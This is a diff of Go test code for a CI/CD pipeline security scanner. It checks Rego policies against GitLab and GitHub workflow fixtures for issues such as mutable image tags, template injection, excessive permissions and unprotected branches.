+ out = append(out, splitNameTag(s))
+ case map[any]any:
+ m, _ := toStringMap(s)
+ if name, ok := m["name"].(string); ok {
+ out = append(out, splitNameTag(name))
+ }
+ }
+ }
+ return out
+}
+
+// parseScriptsField normalises the GitLab script: block into a list.
+func parseScriptsField(v any) []string {
+ switch s := v.(type) {
+ case string:
+ return []string{s}
+ case []any:
+ out := make([]string, 0, len(s))
+ for _, item := range s {
+ if str, ok := item.(string); ok {
+ out = append(out, str)
+ }
+ }
+ return out
+ }
+ return nil
+}
+
+// parseVariablesField stringifies the variables map for policy consumption.
+func parseVariablesField(v any) map[string]string {
+ m, ok := toStringMap(v)
+ if !ok {
+ return nil
+ }
+ out := make(map[string]string, len(m))
+ for k, val := range m {
+ if s, ok := val.(string); ok {
+ out[k] = s
+ continue
+ }
+ out[k] = fmt.Sprintf("%v", val)
+ }
+ return out
+}
+
+// parseGitHubActions is the GitHub counterpart of parseGitLabCI. It walks
+// workflow `jobs..container`, which may be either a string shortcut
+// ("alpine:latest") or a map ({"image": "...", ...}), and maps each job to
+// the shared IR so policies remain provider-agnostic.
+// Limitations: `steps[].uses` and matrix strategies are not modeled yet.
+func parseGitHubActions(t *testing.T, data []byte) *ir.NormalizedPipeline {
+ t.Helper()
+
+ var raw map[string]any
+ if err := yaml.Unmarshal(data, &raw); err != nil {
+ t.Fatalf("parse yaml: %v", err)
+ }
+
+ jobsMap, ok := toStringMap(raw["jobs"])
+ if !ok {
+ t.Fatalf("workflow is missing a top-level jobs: mapping")
+ }
+
+ var jobs []ir.Job
+ for name, v := range jobsMap {
+ section, ok := toStringMap(v)
+ if !ok {
+ continue
+ }
+ job := ir.Job{Name: name}
+ if img, ok := parseGitHubContainer(section["container"]); ok {
+ job.Image = &img
+ }
+ if uses := parseGitHubStepsUses(section["steps"]); len(uses) > 0 {
+ job.Uses = uses
+ }
+ jobs = append(jobs, job)
+ }
+
+ sort.Slice(jobs, func(i, j int) bool { return jobs[i].Name < jobs[j].Name })
+ return &ir.NormalizedPipeline{Provider: ir.ProviderGitHub, Jobs: jobs}
+}
+
+// parseGitHubContainer accepts both `container: "name:tag"` and
+// `container: { image: "name:tag" }`.
+func parseGitHubContainer(v any) (ir.Image, bool) {
+ switch c := v.(type) {
+ case string:
+ return splitNameTag(c), true
+ case map[any]any:
+ m, _ := toStringMap(c)
+ if img, ok := m["image"].(string); ok {
+ return splitNameTag(img), true
+ }
+ }
+ return ir.Image{}, false
+}
+
+// toStringMap normalizes the yaml.v2 untyped map form to map[string]any.
+func toStringMap(v any) (map[string]any, bool) {
+ m, ok := v.(map[any]any)
+ if !ok {
+ return nil, false
+ }
+ out := make(map[string]any, len(m))
+ for k, vv := range m {
+ ks, ok := k.(string)
+ if !ok {
+ continue
+ }
+ out[ks] = vv
+ }
+ return out, true
+}
+
+// parseImageField accepts both the `image: "name:tag"` shorthand and the
+// `image: { name: "...", tag: "..." }` long form.
+func parseImageField(v any) (ir.Image, bool) {
+ switch img := v.(type) {
+ case string:
+ return splitNameTag(img), true
+ case map[any]any:
+ m, _ := toStringMap(img)
+ name, _ := m["name"].(string)
+ tag, _ := m["tag"].(string)
+ if name == "" {
+ return ir.Image{}, false
+ }
+ if tag == "" && strings.Contains(name, ":") {
+ // Sometimes the whole reference lands in `name`.
+ return splitNameTag(name), true
+ }
+ return ir.Image{Name: name, Tag: tag}, true
+ default:
+ return ir.Image{}, false
+ }
+}
+
+func splitNameTag(ref string) ir.Image {
+ // Digest form takes precedence: "alpine@sha256:..."
+ if at := strings.Index(ref, "@"); at > 0 {
+ return ir.Image{Name: ref[:at], Digest: ref[at+1:]}
+ }
+ if idx := strings.LastIndex(ref, ":"); idx > 0 {
+ return ir.Image{Name: ref[:idx], Tag: ref[idx+1:]}
+ }
+ return ir.Image{Name: ref}
+}
+
+// TestIssue102_ImageMutableTag drives the embedded image_mutable_tag policy
+// against real CI/CD fixtures for both GitLab and GitHub. The same Rego
+// policy is used unchanged β only the test-time YAML β IR parser differs
+// per provider, which is the whole point of the multi-provider refactor.
+func TestIssue102_ImageMutableTag(t *testing.T) {
+ type fixture struct {
+ file string
+ expectedJobHits []string
+ }
+ type providerSuite struct {
+ name string
+ dir string
+ parse func(*testing.T, []byte) *ir.NormalizedPipeline
+ fixtures []fixture
+ }
+
+ suites := []providerSuite{
+ {
+ name: "gitlab",
+ dir: filepath.Join("testdata", "ISSUE-102", "gitlab"),
+ parse: parseGitLabCI,
+ fixtures: []fixture{
+ {"violation_latest.gitlab-ci.yml", []string{"deploy"}},
+ {"violation_wildcards.gitlab-ci.yml", []string{"ci"}},
+ {"clean.gitlab-ci.yml", nil},
+ },
+ },
+ {
+ name: "github",
+ dir: filepath.Join("testdata", "ISSUE-102", "github"),
+ parse: parseGitHubActions,
+ fixtures: []fixture{
+ {"violation_latest.workflow.yml", []string{"deploy"}},
+ {"violation_wildcards.workflow.yml", []string{"ci"}},
+ {"clean.workflow.yml", nil},
+ },
+ },
+ }
+
+ forbiddenTags := []string{"latest", "dev", "*-alpha"}
+ cfg := map[string]any{
+ "imageMutableTag": map[string]any{"forbiddenTags": forbiddenTags},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, suite := range suites {
+ for _, fx := range suite.fixtures {
+ t.Run(suite.name+"/"+fx.file, func(t *testing.T) {
+ path := filepath.Join(suite.dir, fx.file)
+ data, err := os.ReadFile(path)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ pipeline := suite.parse(t, data)
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-102" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ sort.Strings(fx.expectedJobHits)
+ if !stringSlicesEqual(hits, fx.expectedJobHits) {
+ t.Fatalf("%s/%s: expected hits on %v, got %v",
+ suite.name, fx.file, fx.expectedJobHits, hits)
+ }
+ })
+ }
+ }
+}
+
+// TestIssue509_ExcessivePermissions drives the excessive_permissions
+// policy against real GitHub workflow fixtures. It uses the real
+// production collector (ScanGitHubWorkflows) rather than the test-time
+// parser to exercise the permissions propagation end-to-end.
+func TestIssue509_ExcessivePermissions(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {
+ fixture: "violation_workflow_write_all.yml",
+ expectedHits: []string{"violation_workflow_write_all/publish"},
+ },
+ {
+ fixture: "violation_job_write_all.yml",
+ expectedHits: []string{"violation_job_write_all/loose"},
+ },
+ {
+ fixture: "clean_minimal.yml",
+ expectedHits: nil,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ // Stage the fixture under a fake .github/workflows/ dir so
+ // ScanGitHubWorkflows can discover it unmodified.
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-509", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-509" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue414_DangerousTriggers drives the dangerous_triggers policy
+// against fixtures covering the two primary risky trigger types and
+// the safe baseline. As for ISSUE-509 the test exercises the real
+// production collector (ScanGitHubWorkflows) rather than the test-time
+// parser.
+func TestIssue414_DangerousTriggers(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {
+ fixture: "violation_pull_request_target.yml",
+ expectedHits: []string{"violation_pull_request_target/preview"},
+ },
+ {
+ fixture: "violation_workflow_run.yml",
+ expectedHits: []string{"violation_workflow_run/post"},
+ },
+ {
+ fixture: "clean_pull_request.yml",
+ expectedHits: nil,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-414", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-414" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue206_TemplateInjection drives the template_injection policy
+// against fixtures covering the two most common unsafe patterns and
+// the canonical safe env-variable workaround.
+func TestIssue206_TemplateInjection(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {
+ fixture: "violation_pr_title.yml",
+ expectedHits: []string{"violation_pr_title/bad"},
+ },
+ {
+ fixture: "violation_head_ref.yml",
+ expectedHits: []string{"violation_head_ref/bad"},
+ },
+ {
+ fixture: "clean_env_var.yml",
+ expectedHits: nil,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-206", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-206" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue208_InsecureCommands drives the insecure_commands policy
+// against a violation where `ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'`
+// is set at the job level, and a baseline job with benign env vars.
+func TestIssue208_InsecureCommands(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {
+ fixture: "violation_enabled.yml",
+ expectedHits: []string{"violation_enabled/bad"},
+ },
+ {
+ fixture: "clean.yml",
+ expectedHits: nil,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-208", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-208" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue307_Artipacked drives the artipacked policy against a
+// default actions/checkout (violation) and one explicitly passing
+// `persist-credentials: false` (clean).
+func TestIssue307_Artipacked(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {
+ fixture: "violation_default_checkout.yml",
+ expectedHits: []string{"violation_default_checkout/clone"},
+ },
+ {
+ fixture: "clean_credentials_disabled.yml",
+ expectedHits: nil,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-307", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-307" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue103_ImagePinnedByDigest drives the image_pinned_by_digest
+// policy against GitLab and GitHub fixtures, covering both the tagged
+// violation and the digest-pinned clean baseline. The policy only
+// fires when mustBePinnedByDigest is explicitly enforced in the
+// input config.
+func TestIssue103_ImagePinnedByDigest(t *testing.T) {
+ type fixture struct {
+ file string
+ expectedJobHits []string
+ }
+ type providerSuite struct {
+ name string
+ dir string
+ parse func(*testing.T, []byte) *ir.NormalizedPipeline
+ fixtures []fixture
+ }
+
+ suites := []providerSuite{
+ {
+ name: "gitlab",
+ dir: filepath.Join("testdata", "ISSUE-103", "gitlab"),
+ parse: parseGitLabCI,
+ fixtures: []fixture{
+ {"violation_tagged.gitlab-ci.yml", []string{"build", "deploy"}},
+ {"clean_pinned.gitlab-ci.yml", nil},
+ },
+ },
+ {
+ name: "github",
+ dir: filepath.Join("testdata", "ISSUE-103", "github"),
+ parse: parseGitHubActions,
+ fixtures: []fixture{
+ {"violation_tagged.workflow.yml", []string{"build"}},
+ {"clean_pinned.workflow.yml", nil},
+ },
+ },
+ }
+
+ cfg := map[string]any{
+ "containerImageMustNotUseForbiddenTags": map[string]any{
+ "mustBePinnedByDigest": true,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, suite := range suites {
+ for _, fx := range suite.fixtures {
+ t.Run(suite.name+"/"+fx.file, func(t *testing.T) {
+ path := filepath.Join(suite.dir, fx.file)
+ data, err := os.ReadFile(path)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ pipeline := suite.parse(t, data)
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-103" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), fx.expectedJobHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s/%s: expected %v, got %v",
+ suite.name, fx.file, expected, hits)
+ }
+ })
+ }
+ }
+}
+
+// TestIssue412_DockerInDocker flags GitLab jobs attaching a DinD service.
+func TestIssue412_DockerInDocker(t *testing.T) {
+ runGitLabPolicyCases(t, "ISSUE-412", []policyCase{
+ {"violation_dind.gitlab-ci.yml", []string{"docker-build"}},
+ {"clean_kaniko.gitlab-ci.yml", nil},
+ }, nil)
+}
+
+// TestIssue413_DockerInDockerInsecure flags DinD with TLS disabled.
+func TestIssue413_DockerInDockerInsecure(t *testing.T) {
+ runGitLabPolicyCases(t, "ISSUE-413", []policyCase{
+ {"violation_tls_disabled.gitlab-ci.yml", []string{"docker-build"}},
+ {"clean_tls_enabled.gitlab-ci.yml", nil},
+ }, nil)
+}
+
+// TestIssue203_DebugTrace flags jobs enabling CI_DEBUG_TRACE.
+// The legacy Go control disables itself when forbiddenVariables is
+// empty, so the Rego policy mirrors that contract: cfg must declare
+// the list explicitly β there is no built-in default.
+func TestIssue203_DebugTrace(t *testing.T) {
+ cfg := map[string]any{
+ "debugTrace": map[string]any{
+ "forbiddenVariables": []string{"CI_DEBUG_TRACE", "CI_DEBUG_SERVICES"},
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-203", []policyCase{
+ {"violation_debug_enabled.gitlab-ci.yml", []string{"deploy"}},
+ {"clean.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue411_UnverifiedScripts flags pipe-to-shell patterns.
+func TestIssue411_UnverifiedScripts(t *testing.T) {
+ runGitLabPolicyCases(t, "ISSUE-411", []policyCase{
+ {"violation_pipe_to_shell.gitlab-ci.yml", []string{"install"}},
+ {"clean_checksum.gitlab-ci.yml", nil},
+ }, nil)
+}
+
+// TestIssue403_IncludesOutdated flags includes whose ref differs from
+// the resolved latest version.
+func TestIssue403_IncludesOutdated(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {Kind: "component", Source: "plumber/base", Ref: "1.0.0", Current: "1.2.3"},
+ {Kind: "component", Source: "plumber/other", Ref: "2.0.0", Current: "2.0.0"},
+ {Kind: "local", Source: "ci/lint.yml"},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-403" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-403 finding, got %d", hits)
+ }
+}
+
+// TestIssue501_BranchUnprotected flags branches matching a required
+// name pattern that the provider reports as unprotected.
+func TestIssue501_BranchUnprotected(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"release-*"},
+ "defaultMustBeProtected": true,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ DefaultBranch: "main",
+ Branches: []ir.Branch{
+ {Name: "main", Protected: false},
+ {Name: "release-1.0", Protected: false},
+ {Name: "feature/foo", Protected: false},
+ {Name: "main-protected", Protected: true}, // just noise
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-501" {
+ hits++
+ }
+ }
+ if hits != 2 {
+ t.Fatalf("expected 2 ISSUE-501 findings (main + release-1.0), got %d", hits)
+ }
+}
+
+// TestIssue505_BranchNonCompliant flags protected branches whose
+// settings fail to meet the declared minimum bar.
+func TestIssue505_BranchNonCompliant(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"main", "low-push"},
+ "allowForcePush": false,
+ "codeOwnerApprovalRequired": true,
+ "minPushAccessLevel": 40,
+ "minMergeAccessLevel": 40,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Branches: []ir.Branch{
+ // main: force push + code owner failures only β push/merge match policy.
+ {Name: "main", Protected: true, AllowForcePush: true, MinPushAccessLevel: 40, MinMergeAccessLevel: 40},
+ {Name: "compliant", Protected: true, CodeOwnerApprovalRequired: true, MinPushAccessLevel: 40, MinMergeAccessLevel: 40},
+ // low-push: push level 30 < 40 (more permissive than required).
+ {Name: "low-push", Protected: true, CodeOwnerApprovalRequired: true, MinPushAccessLevel: 30, MinMergeAccessLevel: 40},
+ {Name: "unprotected", Protected: false},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := map[string]bool{}
+ issue505ByJob := map[string]opaengine.Finding{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-505" {
+ if issue505ByJob[f.Job].Code != "" {
+ t.Fatalf("expected at most one ISSUE-505 per branch, got duplicate for %q", f.Job)
+ }
+ issue505ByJob[f.Job] = f
+ hits[f.Job] = true
+ }
+ }
+ if !hits["main"] || !hits["low-push"] {
+ t.Fatalf("expected main and low-push flagged, got %v", hits)
+ }
+ mainF := issue505ByJob["main"]
+ if !strings.Contains(mainF.Message, "main") || !strings.Contains(mainF.Message, "non-compliant") {
+ t.Fatalf("unexpected ISSUE-505 message for main: %q", mainF.Message)
+ }
+ raw, _ := mainF.Data["reasons"].([]interface{})
+ if len(raw) != 2 {
+ t.Fatalf("expected 2 sub-reasons for main, got %v (Data=%v)", raw, mainF.Data)
+ }
+ if hits["compliant"] || hits["unprotected"] {
+ t.Fatalf("unexpected flag on compliant/unprotected: %v", hits)
+ }
+}
+
+// TestIssue505_AccessLevelStrictestPolicy: GitLab access level 0 = "No one".
+// When policy sets min*AccessLevel: 0, any non-zero branch level is too
+// permissive and should fire (legacy parity).
+func TestIssue505_AccessLevelStrictestPolicy(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"main"},
+ "minPushAccessLevel": 0,
+ "minMergeAccessLevel": 0,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Branches: []ir.Branch{
+ {Name: "main", Protected: true, MinPushAccessLevel: 40, MinMergeAccessLevel: 40},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ if len(findings) != 1 {
+ t.Fatalf("expected 1 finding, got %d: %+v", len(findings), findings)
+ }
+ reasons := toStringSlice(findings[0].Data["reasons"])
+ want := map[string]bool{
+ "Merge access level is too low (40, minimum: 0)": false,
+ "Push access level is too low (40, minimum: 0)": false,
+ }
+ for _, r := range reasons {
+ if _, ok := want[r]; ok {
+ want[r] = true
+ }
+ }
+ for k, hit := range want {
+ if !hit {
+ t.Fatalf("missing reason %q in %v", k, reasons)
+ }
+ }
+}
+
+// TestIssue505_AccessLevelSkipsWhenIRZero: legacy guard β when GitLab does
+// not report a level (cur == 0), no access-level finding is emitted, even if
+// policy requires a positive minimum.
+func TestIssue505_AccessLevelSkipsWhenIRZero(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"main"},
+ "minPushAccessLevel": 40,
+ "minMergeAccessLevel": 40,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Branches: []ir.Branch{
+ {Name: "main", Protected: true},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code != "ISSUE-505" {
+ continue
+ }
+ for _, r := range toStringSlice(f.Data["reasons"]) {
+ if strings.Contains(r, "access level") {
+ t.Fatalf("did not expect access-level reason when IR is 0: %q", r)
+ }
+ }
+ }
+}
+
+func toStringSlice(raw any) []string {
+ switch v := raw.(type) {
+ case []string:
+ return v
+ case []interface{}:
+ out := make([]string, 0, len(v))
+ for _, x := range v {
+ if s, ok := x.(string); ok {
+ out = append(out, s)
+ }
+ }
+ return out
+ }
+ return nil
+}
+
+// TestIssue505_NotInPolicyScope ensures ISSUE-501 scope matches ISSUE-505:
+// a protected but misconfigured branch that does not match namePatterns and
+// is not the default branch when defaultMustBeProtected is false produces no ISSUE-505.
+func TestIssue505_NotInPolicyScope(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "defaultMustBeProtected": false,
+ "namePatterns": []string{"master", "release/*"},
+ "allowForcePush": false,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ DefaultBranch: "main",
+ Branches: []ir.Branch{
+ {Name: "main", Protected: true, AllowForcePush: true},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code == "ISSUE-505" {
+ t.Fatalf("expected no ISSUE-505 when main is out of policy scope, got %+v", f)
+ }
+ }
+}
+
+// TestIssue404_IncludesForbiddenVersion flags includes pinned to a
+// forbidden version.
+func TestIssue404_IncludesForbiddenVersion(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "includesForbiddenVersions": map[string]any{
+ "forbiddenVersions": []string{"dev"},
+ "defaultBranchIsForbiddenVersion": true,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ DefaultBranch: "main",
+ Includes: []ir.Include{
+ {Kind: "component", Source: "plumber/a", Ref: "dev"},
+ {Kind: "component", Source: "plumber/b", Ref: "main"},
+ {Kind: "component", Source: "plumber/c", Ref: "1.0.0"},
+ {Kind: "hardcoded", Source: "plumber/d", Ref: "main"}, // skipped
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-404" {
+ hits++
+ }
+ }
+ if hits != 2 {
+ t.Fatalf("expected 2 ISSUE-404 findings, got %d", hits)
+ }
+}
+
+// TestIssue204_UnsafeVariableExpansion flags scripts re-parsing
+// user-controlled CI variables through a shell.
+func TestIssue204_UnsafeVariableExpansion(t *testing.T) {
+ cfg := map[string]any{
+ "unsafeVariableExpansion": map[string]any{
+ "dangerousVariables": []string{"CI_COMMIT_MESSAGE", "CI_COMMIT_BRANCH"},
+ "allowedPatterns": []string{},
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-204", []policyCase{
+ {"violation_eval.gitlab-ci.yml", []string{"deploy"}},
+ {"clean_echo.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
